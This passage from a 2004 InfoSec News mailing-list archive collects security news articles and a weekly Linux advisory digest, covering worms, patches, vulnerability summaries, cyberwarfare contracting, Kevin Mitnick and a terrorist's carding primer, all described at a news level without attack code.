computer which make up the components of the worm. It constructs messages using its own SMTP engine and harvests target e-mail addresses from the victim's machine. The worm uses several masking techniques including spoofed sender addresses and has been programmed to monitor Internet Explorer browser sessions to capture data relating to various financial sites. An advisory from Symantec rates the risk as low, but distribution remains high. The use of naked celebrity images as a virus infection tactic is nothing new. In the past, virus writers have attached the names of celebrities such as Anna Kournikova, Britney Spears and Halle Berry to mass-mailing worms. From isn at c4i.org Mon Dec 13 04:57:18 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 13 05:13:47 2004 Subject: [ISN] Linux Advisory Watch - December 10th 2004 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 10th, 2004 Volume 5, Number 49a | +---------------------------------------------------------------------+ Editors: Dave Wreski Benjamin D. Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. This week, advisories were released for hpsockd, viewvcs, nfs-util, cyrus-imapd, netatalk, gaim, rhpl, ttfonts, mc, udev, gnome-bluetooth, rsh, mysql, libpng, glib, gtk, postgresql, shadow-utils, perl, mirrorselect, drakxtools, dietlib, gzip, rp-ppoe, openssl, ImageMagick, samba, and cups. The distributors include Debian, Fedora, Gentoo, Mandrake, Red Hat, SuSE, Trustix, and Turbo Linux. ---- Internet Productivity Suite: Open Source Security Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design. http://store.guardiandigital.com/html/eng/products/software/ips_overview.shtml --- Packet Sniffers One of the most common ways intruders gain access to more systems on your network is by employing a packet sniffer on a already compromised host. This "sniffer" just listens on the Ethernet port for things like passwd and login and su in the packet stream and then logs the traffic after that. This way, attackers gain passwords for systems they are not even attempting to break into. Clear-text passwords are very vulnerable to this attack. Example: Host A has been compromised. Attacker installs a sniffer. Sniffer picks up admin logging into Host B from Host C. It gets the admins personal password as they login to B. Then, the admin does a su to fix a problem. They now have the root password for Host B. Later the admin lets someone telnet from his account to Host Z on another site. Now the attacker has a password/login on Host Z. In this day and age, the attacker doesn't even need to compromise a system to do this: they could also bring a laptop or pc into a building and tap into your net. Using ssh or other encrypted password methods thwarts this attack. Things like APOP for POP accounts also prevents this attack. (Normal POP logins are very vulnerable to this, as is anything that sends clear-text passwords over the network.) Excerpt from LinuxSecurity HowTO: http://www.linuxsecurity.com/docs/LDP/Security-HOWTO/ By: Dave Wreski (dave@linuxsecurity.com) & Kevin Fenzi ----- Mass deploying Osiris Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel. http://www.linuxsecurity.com/content/view/101884/49/ --------------------------------------------------------------------- AIDE and CHKROOTKIT Network security is continuing to be a big problem for companies and home users. The problem can be resolved with an accurate security analysis. In this article I show how to approach security using aide and chkrootkit. http://www.linuxsecurity.com/content/view/101882/49/ ------ --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------------------+ | Distribution: Debian | ----------------------------// +---------------------------------+ * Debian: hpsockd denial of service fix 3rd, December, 2004 "infamous41md" discovered a buffer overflow condition in hpsockd, the socks server written at Hewlett-Packard. An exploit could cause the program to crash or may have worse effect. http://www.linuxsecurity.com/content/view/117313 * Debian: viewcvs information leak fix 6th, December, 2004 Hajvan Sehic discovered several vulnerabilities in viewcvs, a utility for viewing CVS and Subversion repositories via HTTP. When exporting a repository as a tar archive the hide_cvsroot and forbidden settings were not honoured enough. http://www.linuxsecurity.com/content/view/117392 * Debian: nfs-util denial of service fix 8th, December, 2004 SGI has discovered that rpc.statd from the nfs-utils package, the Network Status Monitor, did not ignore the "SIGPIPE". Hence, a client prematurely terminating the TCP connection could also terminate the server process. http://www.linuxsecurity.com/content/view/117423 +---------------------------------+ | Distribution: Fedora | ----------------------------// +---------------------------------+ * Fedora: cyrus-imapd-2.2.10-3.fc2 update 3rd, December, 2004 The recent update to cyrus-imapd-2.2.10-1.fc2 for security exploits revealed a package installation problem. http://www.linuxsecurity.com/content/view/117366 * Fedora: cyrus-imapd-2.2.10-3.fc3 update 3rd, December, 2004 The recent update to cyrus-imapd-2.2.10-1.fc3 for security exploits revealed a package installation problem. If the main configuration files for cyrus-imapd http://www.linuxsecurity.com/content/view/117367 * Fedora: netatalk-1.6.4-2.2 update 6th, December, 2004 Fix to temp file vulnerability in /etc/psf/etc2ps http://www.linuxsecurity.com/content/view/117395 * Fedora: netatalk-1.6.4-4 update 6th, December, 2004 Fix temp file vulnerability in /etc/psf/etc2ps http://www.linuxsecurity.com/content/view/117396 * Fedora: gaim-1.1.0-0.FC2 update 6th, December, 2004 Gaim allows you to talk to anyone using a variety of messaging protocols, including AIM (Oscar and TOC), ICQ, IRC, Yahoo!, MSN Messenger, Jabber, Gadu-Gadu, Napster, and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. http://www.linuxsecurity.com/content/view/117397 * Fedora: gaim-1.1.0-0.FC3 update 6th, December, 2004 Gaim allows you to talk to anyone using a variety of messaging protocols, including AIM (Oscar and TOC), ICQ, IRC, Yahoo!, MSN Messenger, Jabber, Gadu-Gadu, Napster, and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. http://www.linuxsecurity.com/content/view/117398 * Fedora: rhpl-0.148.1-2 update 6th, December, 2004 Remove synaptics requires (#137935) http://www.linuxsecurity.com/content/view/117399 * Fedora: ttfonts-ja-1.2-36.FC3.0 update 7th, December, 2004 reverted the previous changes so that it broke ghostscript working. (#139798) http://www.linuxsecurity.com/content/view/117404 * Fedora: mc-4.6.1-0.11FC3 update 7th, December, 2004 The updated version of Midnight Commander contains finished CAN-2004-0494 security fixes in extfs scripts and has better support for UTF-8, contains subshell prompt fixes and enhanced large file support. http://www.linuxsecurity.com/content/view/117417 * Fedora: udev-039-10.FC3.4 update 7th, December, 2004 udev is a implementation of devfs in userspace using sysfs and /sbin/hotplug. It requires a 2.6 kernel to run properly. http://www.linuxsecurity.com/content/view/117418 * Fedora: udev-039-10.FC3.5 update 7th, December, 2004 fixed udev.rules for cdrom symlinks (bug 141897) http://www.linuxsecurity.com/content/view/117419 * Fedora: gnome-bluetooth-0.5.1-5.FC3.1 update 7th, December, 2004 fixed again gnome-bluetooth-manager script for 64bit (bug 134864) http://www.linuxsecurity.com/content/view/117420 * Fedora: rsh update 8th, December, 2004 fixed rexec fails with "Invalid Argument" (#118630) http://www.linuxsecurity.com/content/view/117432 * Fedora: Omni-0.9.2-1.1 update 8th, December, 2004 This is the 0.9.2 release of the Omni printer driver collection. It also fixes a library path problem on multilib architectures such as x86_64. http://www.linuxsecurity.com/content/view/117433 * Fedora: mysql-3.23.58-9.1 update 8th, December, 2004 fix security issues CAN-2004-0835, CAN-2004-0836, CAN-2004-0837 (bugs #135372, 135375, 135387) http://www.linuxsecurity.com/content/view/117434 * Fedora: libpng-1.2.8-1.fc2 update 9th, December, 2004 Updates libpng to the current release 1.2.8. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html http://www.linuxsecurity.com/content/view/117439 * Fedora: libpng10-1.0.18-1.fc2 update 9th, December, 2004 Updates libpng10 to the current release 1.0.18. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html http://www.linuxsecurity.com/content/view/117440 * Fedora: glib2-2.4.8-1.fc2 update 9th, December, 2004 Updates GLib to the current stable release 2.4.8. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004- December/msg00004.html http://www.linuxsecurity.com/content/view/117441 * Fedora: gtk2-2.4.14-1.fc2 update 9th, December, 2004 Updates GTK+ to the current stable release 2.4.14. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004- December/msg00007.html http://www.linuxsecurity.com/content/view/117442 * Fedora: libpng10-1.0.18-1.fc3 update 9th, December, 2004 Updates libpng10 to the current release 1.0.18. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html http://www.linuxsecurity.com/content/view/117443 * Fedora: libpng-1.2.8-1.fc3 update 9th, December, 2004 Updates libpng to the current release 1.2.8. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html http://www.linuxsecurity.com/content/view/117444 * Fedora: glib2-2.4.8-1.fc3 update 9th, December, 2004 Updates GLib to the current stable release 2.4.8. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004- December/msg00004.html http://www.linuxsecurity.com/content/view/117445 * Fedora: gtk2-2.4.14-1.fc3 update 9th, December, 2004 Updates GTK+ to the current stable release 2.4.14. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004- December/msg00007.html http://www.linuxsecurity.com/content/view/117446 * Fedora: postgresql-odbc-7.3-6.2 update 9th, December, 2004 This update fixes problems occurring on 64-bit platforms. http://www.linuxsecurity.com/content/view/117447 * Fedora: postgresql-odbc-7.3-8.FC3.1 update 9th, December, 2004 This update fixes problems occurring on 64-bit platforms. http://www.linuxsecurity.com/content/view/117448 * Fedora: postgresql-7.4.6-1.FC2.1 update 9th, December, 2004 This update synchronizes PostgreSQL for FC2 with the version already released in FC3. http://www.linuxsecurity.com/content/view/117449 * Fedora: shadow-utils-4.0.3-55 update 9th, December, 2004 A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature... http://www.linuxsecurity.com/content/view/117452 * Fedora: shadow-utils-4.0.3-56 update 9th, December, 2004 A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature... http://www.linuxsecurity.com/content/view/117453 * Gentoo: rssh, scponly Unrestricted command execution 3rd, December, 2004 rssh and scponly do not filter command-line options that can be exploited to execute any command, thereby allowing a remote user to completely bypass the restricted shell. http://www.linuxsecurity.com/content/view/117364 +---------------------------------+ | Distribution: Gentoo | ----------------------------// +---------------------------------+ * Gentoo: PDFlibs Multiple overflows in the included TIFF library 6th, December, 2004 PDFlib is vulnerable to multiple overflows, which can potentially lead to the execution of arbitrary code. http://www.linuxsecurity.com/content/view/117393 * Gentoo: imlib Buffer overflows in image decoding 6th, December, 2004 Multiple overflows have been found in the imlib library image decoding routines, potentially allowing execution of arbitrary code. http://www.linuxsecurity.com/content/view/117394 * Gentoo: perl Insecure temporary file creation 6th, December, 2004 Perl is vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files. http://www.linuxsecurity.com/content/view/117402 * Gentoo: mirrorselect Insecure temporary file creation 7th, December, 2004 mirrorselect is vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files. http://www.linuxsecurity.com/content/view/117403 * Mandrake: drakxtools update 7th, December, 2004 Beginning immediately, all bug reports for stable releases will be handled via Bugzilla at http://qa.mandrakesoft.com/. The drakbug tool has been updated to point users of stable releases to Bugzilla. http://www.linuxsecurity.com/content/view/117405 +---------------------------------+ | Distribution: Mandrake | ----------------------------// +---------------------------------+ * Mandrake: dietlibc fix 7th, December, 2004 There was a problem with dietlibc in Mandrakelinux 10.0/amd64 where it would not provide proper support for the AMD64 architecture. The updated package fixes this. http://www.linuxsecurity.com/content/view/117406 * Mandrake: gzip fix 7th, December, 2004 The Trustix developers found some insecure temporary file creation problems in the zdiff, znew, and gzeze supplemental scripts in the gzip package. These flaws could allow local users to overwrite files via a symlink attack. http://www.linuxsecurity.com/content/view/117407 * Mandrake: ImageMagick fix 7th, December, 2004 A vulnerability was discovered in ImageMagick where, due to a boundary error within the EXIF parsing routine, a specially crafted graphic image could potentially lead to the execution of arbitrary code. http://www.linuxsecurity.com/content/view/117408 * Mandrake: lvml fix 7th, December, 2004 The Trustix developers discovered that the lvmcreate_initrd script, part of the lvm1 package, created a temporary directory in an insecure manner. This could allow for a symlink attack to create or overwrite arbitrary files with the privileges of the user running the script. http://www.linuxsecurity.com/content/view/117409 * Mandrake: rp-pppoe fix 7th, December, 2004 Max Vozeler discovered a vulnerability in pppoe, part of the rp-pppoe package. When pppoe is running setuid root, an attacker can overwrite any file on the system. Mandrakelinux does not install pppoe setuid root, however the packages have been patched to prevent this problem. http://www.linuxsecurity.com/content/view/117410 * Mandrake: nfs-utils fix 7th, December, 2004 SGI developers discovered a remote DoS (Denial of Service) condition in the NFS statd server. rpc.statd did not ignore the "SIGPIPE" signal which would cause it to shutdown if a misconfigured or malicious peer terminated the TCP connection prematurely. http://www.linuxsecurity.com/content/view/117411 * Mandrake: openssl fix 7th, December, 2004 The Trustix developers found that the der_chop script, included in the openssl package, created temporary files insecurely. This could allow local users to overwrite files using a symlink attack. http://www.linuxsecurity.com/content/view/117412 * Trustix: multiple package bugfixes 9th, December, 2004 amavisd-new AMaViS is a script that interfaces a mail transport agent (MTA) with one or more virus scanners. http://www.linuxsecurity.com/content/view/117437 +---------------------------------+ | Distribution: Trustix | ----------------------------// +---------------------------------+ * Trustix: nfs-util Remote denial of service 9th, December, 2004 SGI developers discovered a remote Denial of Service in the NFS statd server where it did not ignore the "SIGPIPE" signal. This could cause the server to shut down if a client terminates prematurely. http://www.linuxsecurity.com/content/view/117438 +---------------------------------+ | Distribution: Red Ha | ----------------------------// +---------------------------------+ * Red Hat: ImageMagick security vulnerability fix 8th, December, 2004 Updated ImageMagick packages that fixes a buffer overflow are now available. http://www.linuxsecurity.com/content/view/117431 +---------------------------------+ | Distribution: SuSE | ----------------------------// +---------------------------------+ * SuSE: cyrus-imapd remote command execution 3rd, December, 2004 Stefan Esser reported various bugs within the Cyrus IMAP Server. These include buffer overflows and out-of-bounds memory access which could allow remote attackers to execute arbitrary commands as root. The bugs occur in the pre-authentication phase, therefore an update is strongly recommended. http://www.linuxsecurity.com/content/view/117317 +---------------------------------+ | Distribution: TurboLinux | ----------------------------// +---------------------------------+ * TurboLinux: samba, cups vulnerabilities 8th, December, 2004 Two vulnerabilities discovered in Samba. DoS vulnerability in cups. http://www.linuxsecurity.com/content/view/117424 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Wed Dec 15 03:25:11 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 15 03:41:27 2004 Subject: [ISN] Desktop search new target for viruses? Message-ID: http://news.com.com/Desktop+search+new+target+for+viruses/2100-7349_3-5491070.html By Munir Kotadia Special to CNET News.com December 14, 2004 Security experts are warning that virus writers could use new desktop search tools to make their malicious software more efficient. Foad Fadaghi, senior industry analyst at Frost & Sullivan Australia, said that most viruses are designed to harvest e-mail addresses and other personal information from an infected system. He warned that because desktop search tools such as those recently announced by Google, Microsoft and Yahoo can index and categorize that information, virus writers are likely to start exploiting the technology. "Desktop search products are very efficient at harvesting data, so it wouldn't be surprising if exploits are sought by malicious coders. Any software that can index and capture data on a user's PC will be subject to virus and Trojan exploits. It is just a matter of time," Fadaghi said. Neil Campbell, the national security manager of IT services company Dimension Data, said that any change in the desktop environment can create new security vulnerabilities, so when companies decide to adopt a new product they should look beyond the user benefits. "It sounds like great technology, but don't deploy it without considering the security implications. With any new product area there is a need to consider security," Campbell said. According to Campbell, virus writers are unlikely to start targeting the new tools immediately--but only because they are not common. "It is not going to be in the virus writers' best interest to target them immediately. I would expect the spread of a virus to be inhibited because of the low take-up rate--at least to start with," Campbell said. Viruses have already used Internet search engines to harvest e-mail addresses. In July, a MyDoom variant pumped so many queries into Google that the search engine was unavailable or very slow for large periods of time. The same variant of MyDoom also succeeded in knocking a number of smaller search engines--including Lycos and AltaVista--off the Web completely. At the time, Graham Cluley, senior technology consultant at antivirus firm Sophos, said he expected virus authors to continue manipulating search engine technologies. "You don't have to be psychic to predict the release of more worms trying to scoop up e-mail addresses from search engines. Unfortunately, we expect to see other worm authors trying similar tricks in the future," Cluley said. Dimension Data's Campbell said that if companies do choose to use desktop search tools, they should take extra care to ensure viruses do not get a chance to reach the desktop. "You need to consider these issues once the virus has infected your PC, but more importantly, companies should prevent the virus from executing. Make sure the PCs are up-to-date from a patch and antivirus perspective and loaded with a personal firewall," Campbell said. Munir Kotadia of ZDNet Australia reported from Sydney. From isn at c4i.org Wed Dec 15 03:25:58 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 15 03:41:31 2004 Subject: [ISN] Microsoft Plugs Code Execution Holes on Patch Day Message-ID: http://www.eweek.com/article2/0,1759,1741024,00.asp By Ryan Naraine December 14, 2004 Microsoft on Tuesday released fixes for five vulnerabilities in Windows products, including a patch for a known security issue in the WINS (Windows Internet Name Service) name server. As expected, the company released five advisories with "important" severity ratings but warned that four of the five could lead to code execution attacks. Microsoft typically rates code execution flaws as "critical," and the lowered ratings raised some eyebrows since independent researchers have already warned of the serious nature of the WINS vulnerability, which could allow a remote attacker to take complete control of an affected system. According to Stephen Toulouse, program manager at the Microsoft Security Response Center, "critical" ratings are reserved for bugs that the company considers "wormable." "A critical vulnerability means that, in the default scenario on a PC connected to the Internet, a criminal could exploit it in such a way that it spreads from machine to machine. We reserve critical ratings for vulnerabilities that are wormable," Toulouse told eWEEK.com. "Code execution does not necessarily mean it's critical," he said, explaining that the WINS vulnerability was rated one step below because it was not an Internet-facing technology and because the service is not installed by default on Windows systems. The WINS patch (MS04-045) comes just two weeks after a private research firm warned that it could lead to complete system hijack. Microsoft confirmed as much in its December advisory. "An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing or deleting data; or creating new accounts that have full privileges," the company said. The company said WINS users were at risk of system hijack because of the way the WINS server handles computer name validation and association context validation. A hacker could exploit the name validation flaw by constructing a malicious network packet that could potentially allow remote code execution on an affected system. According to the alert, the association context vulnerability could allow an attacker to construct a malicious network packet to take complete control of an affected system. In Windows Server 2003, the company said an exploit would only result in a denial-of-service condition. Microsoft already released bulletin MS04-041 to plug two holes in WordPad that put users at risk of code execution attacks. Affected software include Windows NT Server 4.0, Windows 2000, Windows XP Service Pack 1 and Windows Server 2003. The WordPad flaws exist in the table conversion and font conversion features. While a successful attack could lead to harmful code execution, Microsoft said significant user interaction is required to exploit both vulnerabilities. A third patch, MS04-042, corrects two bugs in the DHCP (Dynamic Host Configuration Protocol) Server service that could allow code execution and denial-of-service attacks. The DHCP flaw affects Windows NT Server 4.0 customers. Microsoft warned that a successful exploit of the DHCP holes could allow an attacker to take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. A separate advisory, MS04-043, was released to stop a buffer overrun found in the Windows HyperTerminal utility. Affected software includes Windows NT Server 4.0, Windows 2000, Windows XP (SP1 and SP2) and Windows Server 2003. The company warned that an attacker could construct a malicious HyperTerminal session file to launch code on a vulnerable system. "This vulnerability could attempt to be exploited through a malicious Telnet URL if HyperTerminal has been set as the default Telnet client. An attacker who successfully exploited this vulnerability could take complete control of an affected system," according to the advisory. The fifth "important" advisory for December, MS04-044, corrects issues in Windows Kernel and LSASS that could allow privilege elevation attacks. Microsoft said a successful exploit could put users at risk of having programs installed or data viewed, deleted or changed. The company also reissued the MS04-028 advisory, which affected JPEG Parsing (GDI+) in Windows, Office, Graphics Application and Developer Applications subsystem in Microsoft Windows. The reissue addresses newly available updates for Microsoft Visual FoxPro 8.0 and the Windows .Net Framework 1.0 and 1.1 without Service Pack 1. Two of the five December bulletins apply to Windows XP Service Pack 2, but the severity rating is reduced to "moderate" for those customers. From isn at c4i.org Wed Dec 15 03:26:20 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 15 03:41:33 2004 Subject: [ISN] Linux: Fewer Bugs Than Rivals Message-ID: http://www.wired.com/news/linux/0,1411,66022,00.html By Michelle Delio Dec. 14, 2004 Linux advocates have long insisted that open-source development results in better and more secure software. Now they have statistics to back up their claims. According to a four-year analysis of the 5.7 million lines of Linux source code conducted by five Stanford University computer science researchers, the Linux kernel programming code is better and more secure than the programming code of most proprietary software. The report, set to be released on Tuesday, states that the 2.6 Linux production kernel, shipped with software from Red Hat, Novell and other major Linux software vendors, contains 985 bugs in 5.7 million lines of code, well below the industry average for commercial enterprise software. Windows XP, by comparison, contains about 40 million lines of code, with new bugs found on a frequent basis. Commercial software typically has 20 to 30 bugs for every 1,000 lines of code, according to Carnegie Mellon University's CyLab Sustainable Computing Consortium. This would be equivalent to 114,000 to 171,000 bugs in 5.7 million lines of code. The study identified 0.17 bugs per 1,000 lines of code in the Linux kernel. Of the 985 bugs identified, 627 were in critical parts of the kernel. Another 569 could cause a system crash, 100 were security holes, and 33 of the bugs could result in less-than-optimal system performance. Seth Hallem, CEO of Coverity, a provider of source-code analysis, noted that the majority of the bugs documented in the study have already been fixed by members of the open-source development community. "Our findings show that Linux contains an extremely low defect rate and is evidence of the strong security of Linux," said Hallem. "Many security holes in software are the result of software bugs that can be eliminated with good programming processes." The Linux source-code analysis project started in 2000 at the Stanford University Computer Science Research Center as part of a large research initiative to improve core software engineering processes in the software industry. The initiative now continues at Coverity, a software engineering startup that now employs the five researchers who conducted the study. Coverity said it intends to start providing Linux bug analysis reports on a regular basis and will make a summary of the results freely available to the Linux development community. "This is a benefit to the Linux development community, and we appreciate Coverity's efforts to help us improve the security and stability of Linux," said Andrew Morton, lead Linux kernel maintainer. Morton said developers have already addressed the top-priority bugs uncovered in the study. From isn at c4i.org Wed Dec 15 03:26:46 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 15 03:41:35 2004 Subject: [ISN] Air Force seeks cyberwar edge Message-ID: Forwarded from: William Knowles http://www.fcw.com/fcw/articles/2004/1213/web-cyberwar-12-14-04.asp By Frank Tiboni Dec. 14, 2004 Air Force officials plan to award contracts worth up to $25 million for computer warfare technologies, according to a solicitation [1] issued today. Officials in the Air Force's Research Laboratory in Rome, N.Y., want industry officials to submit papers explaining their ideas and capabilities through 2008. They will review them and award contracts as they receive them, according to the "Cyber Defensive & Offensive Operations Technology" document published today on the Federal Business Opportunities Web site. Industry officials can submit white papers no longer than 10 pages in five computer warfare areas. They include: assured infostructure support; complex systems; covert cyber operations; threat evaluation, attack recognition and diagnosis; and wireless information assurance, the document states. Defense Department and military services officials do not like to discuss the country's computer warfare capabilities. George Tenet, former CIA director, abruptly but politely ended a question-and-answer session last month at the FCW Events' Homeland Security and Information Assurance Conference and Exhibition 2004 when someone asked if the military could disrupt or destroy information on Web sites operated by al Qaeda. DOD officials announced plans last year to create an organization that attacks computer networks. The new group would be under U.S. Strategic Command, one of the department's nine unified combatant commands that oversee the use of combat forces in a geographic region or provide a capability and develop doctrine for them, manages the operation and protection of the military's networks and information operations to include psychological operations and computer network defense and attack. Industry officials said the military's computer network attack capability originated in the National Security Agency. They said DOD officials moved it a few years ago to the former Joint Task Force-Computer Network Operations until they made the computer network attack organization announcement last year and formed the Joint Task Force-Global Network Operations, devoted entirely to computer network defense, in June. [1] http://www2.eps.gov/spg/USAF/AFMC/AFRLRRS/Reference%252DNumber%252DBAA%252D03%252D18%252DIFKA/SynopsisP.html *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Wed Dec 15 03:27:10 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 15 03:41:37 2004 Subject: [ISN] Done the crime, now it's Mitnick's time Message-ID: http://www.theage.com.au/news/Next/Done-the-crime-now-its-Mitnicks-time/2004/12/13/1102786984190.html By Patrick Gray December 14, 2004 Next After a five-month delay, the Department of Immigration has granted the world's most notorious convicted cyber-criminal, Kevin Mitnick, a visa to travel to Australia next year to consult to local companies, accept speaking engagements and promote his new book, scheduled for release in March. It will be Mitnick's first visit to Australia and one of his few trips outside the US and Europe. Mitnick spent more than five years in jail for his exploits, which included hacking into Motorola, Novell, Fujitsu, Sun Microsystems and Nokia to steal software code. Since his release in 2000, he has worked as a security consultant and written two books, The Art of Deception [1] and The Art of Intrusion [2]. Mitnick will fly to Melbourne on March 2 to deliver a keynote speech to an as yet unnamed company. He will fly back to the US the following week to start a book tour, returning to Australia in April to conduct a workshop. Mitnick is best known for his uncanny ability to trick employees into revealing sensitive information, a technique called "social engineering". He cites the theft of two customs computers from Sydney International Airport by three men in August last year as one example of a social engineering attack in Australia. "A lot of companies in Australia are vulnerable," Mitnick says. "That was a pure social engineering attack. We all know they weren't after the hardware, they were after the data." Both of Mitnick's books are about security but many people will be more eager to read the one he plans to start writing on January 21, 2007, when a court order that stops him from profiting from his crimes expires. "I'm definitely doing an autobiography," he says. "It's going to focus on the adventure, the things I did when I was a fugitive, how I lived my life and what was going through my head, the close calls nobody knows about. It will be the Catch Me If You Can of cyberspace." Catch Me If You Can [3] was an autobiography written in 1980 by Frank Abagnale jnr, a con man who passed himself off as a Pan Am pilot while forging $US2.5 million in fake cheques. There have been books written about Mitnick's exploits, most famously Takedown, written by New York Times journalist John Markoff and Tsutomo Shimomura, one of Mitnick's victims, which was made into a movie. But Mitnick says the real story hasn't been told. He has been portrayed as the "Osama bin-Mitnick of the internet", he says, and he wants to set the record straight. Mitnick launched a legal action against the producers of the Takedown movie, which was settled out of court. Although Mitnick spent two years on the run from the FBI in the US living under assumed names, he doesn't expect law enforcement to take much interest in his travels these days. "The only time they call me is when they need my help," Mitnick says. "They don't contact me because they're suspicious I'm doing anything wrong." Mitnick has just finished a vulnerability assessment of a US credit union. Much of his work involves technical testing and doesn't rely on his mastery of social engineering. "I'm doing vulnerability penetration tests, I'm going into companies and hardening their systems and network," he says. "It's all technical, no social engineering." A penetration test is work well suited to Mitnick's talents. Similar to the fictional hackers in the 1992 movie, Sneakers, for a fee, he breaks into companies' networks, submitting a report detailing security weaknesses and vulnerabilities. Before his release, Mitnick had never been out of the US, with the exception of Canada and Mexico. As much as he enjoys seeing the world, Mitnick confesses he is afraid of flying. "I hate to fly, man, I hate it. I have to get some sleeping pills to knock me out." [1] http://www.amazon.com/exec/obidos/ASIN/076454280X/c4iorg [2] http://www.amazon.com/exec/obidos/ASIN/0764569597/c4iorg [3] http://www.amazon.com/exec/obidos/ASIN/0767905385/c4iorg From isn at c4i.org Thu Dec 16 02:01:29 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 16 02:21:09 2004 Subject: [ISN] 'ChineseSpyBoy' claims to have cracked McAfee sites Message-ID: http://www.newsforge.com/article.pl?sid=04/12/15/1821208 By Joe Barr December 15, 2004 Did he or didn't he? A cracker identifying himself as "ChineseSpyBoy" has been contacting news organizations -- including NewsForge -- the past day or so claiming to have broken into McAfee Inc. corporate servers and providing screen shots as evidence. McAfee says he did not break into its boxes but that he did compromise a partner's machine. After receiving news of the alleged break-ins by email, NewsForge invited "ChineseSpyBoy" into an IRC channel to chat about his exploits earlier today. The invitation was readily accepted. In that brief chat, "SpyBoy" told us that his motivation was, first of all, to find a challenge, and secondarily because of his unhappiness with McAfee's customer service. He said that McAfee's customer service was "always speaking online chats, never getting no direct answers." But the primary purpose seems to have been to make a bigger name for himself. When asked if breaking into McAfee's servers was difficult, "SpyBoy" told us: "well took alot of command tribulation, a little bit of deviation and patience ... I was snooping, getting as much info on their servers as possible for weeks." He also told us in the IRC chat that "the point was to get in, play a little get out and then publish it, I am not as destructive as I use to be." As evidence, SpyBoy provided us with links to images on another site which purport to show screen shots captured on McAfee machines. What each screenshot shows, however, is a screen taken on McAfee partner Sento.com's site, which matches up with what McAfee had to say. NewsForge spoke to McAfee corporate PR representative Dana Lengkeek about the alleged compromise. She insisted that no McAfee machines were broken into and noted that they were first contacted about the alleged break-ins yesterday. No Sento representatives were available to speak with NewsForge prior to publication. From isn at c4i.org Thu Dec 16 02:01:50 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 16 02:21:11 2004 Subject: [ISN] An Indonesian's Prison Memoir Takes Holy War Into Cyberspace Message-ID: Forwarded from: William Knowles http://www.washingtonpost.com/wp-dyn/articles/A62095-2004Dec13.html By Alan Sipress Washington Post Foreign Service December 14, 2004 JAKARTA, Indonesia -- After Imam Samudra was charged with engineering the devastating Bali nightclub bombings two years ago, he taunted his police accusers in court, then greeted his death sentence with the cry, "Infidels die!" So when Samudra published a jailhouse autobiography this fall, it was not surprising that it contained virulent justifications for the Bali attacks, which killed 202 people, most of them foreign tourists. But tucked into the back of the 280-page book is a chapter of an entirely different cast titled "Hacking, Why Not?" There, Samudra urges fellow Muslim radicals to take the holy war into cyberspace by attacking U.S. computers, with the particular aim of committing credit card fraud, called "carding." The chapter then provides an outline on how to get started. The primer on carding is rudimentary, according to U.S. and Indonesian cybercrime experts, but they said the chapter provides a rare glimpse into the mounting threat posed by terrorists using Internet fraud to finance their operations. "The worry is that an army of people doing cybercrime could raise a great deal of money for other activities that terrorists are carrying out," said Alan Paller, research director of the Sans Institute, a U.S. Internet-security training company. Samudra, 34, is among the most technologically savvy members of Jemaah Islamiah, an underground Islamic radical movement in Southeast Asia that is linked to al Qaeda. He sought to fund the Bali attacks in part through online credit card fraud, according to Indonesian police. They said Samudra's laptop computer revealed an attempt at carding, but it was unclear whether he had succeeded. Internet crime experts said Samudra's book seems unprecedented as a tool for recruiting radical Muslims into a campaign of online fraud and building networks of fundraisers. "This is exactly the kind of advice you would give someone who wanted to get started in cybercrime," said Paller, who reviewed a translation of the chapter. "It doesn't focus on a specific technique, but focuses on how you find techniques and focuses on connecting with other people to act loosely together." Titled "Me Against the Terrorist!" the book depicts Samudra on the cover in a now-classic pose from his trial last year in Bali. He is clad in a white shirt and white 